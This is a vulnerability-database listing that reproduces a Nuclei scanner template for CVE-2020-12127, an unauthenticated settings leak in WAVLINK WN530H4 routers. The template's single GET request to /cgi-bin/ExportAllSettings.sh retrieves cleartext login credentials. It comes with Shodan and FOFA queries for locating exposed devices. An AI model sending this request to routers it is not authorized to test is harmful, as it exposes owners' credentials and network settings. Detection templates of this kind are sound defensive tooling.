Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-12127
HistoryAug 14, 2022 - 8:15 p.m.

WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure

2022-08-1420:15:23
ProjectDiscovery
github.com
5
wavlink
information exposure
router configuration

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.053

Percentile

93.1%

WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
id: CVE-2020-12127

info:
  name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
  author: arafatansari
  severity: high
  description: |
    WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.
  reference:
    - https://cerne.xyz/bugs/CVE-2020-12127
    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12127
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-12127
    cwe-id: CWE-306
    epss-score: 0.06164
    epss-percentile: 0.93545
    cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn530h4_firmware
    shodan-query:
      - http.html:"Wavlink"
      - http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2020,wavlink,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Login='
          - 'Password='
          - 'Model='
          - 'AuthMode='
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200d60c1ad1b1b92b6296b8c5eed86bd648e83612be1c9fbc412c3fc83e1c9ebd202201a69a56bd6f387d3f10102c3bb19f103e6494f3379bfdf930a0c995f74ec5411:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.053

Percentile

93.1%

Related for NUCLEI:CVE-2020-12127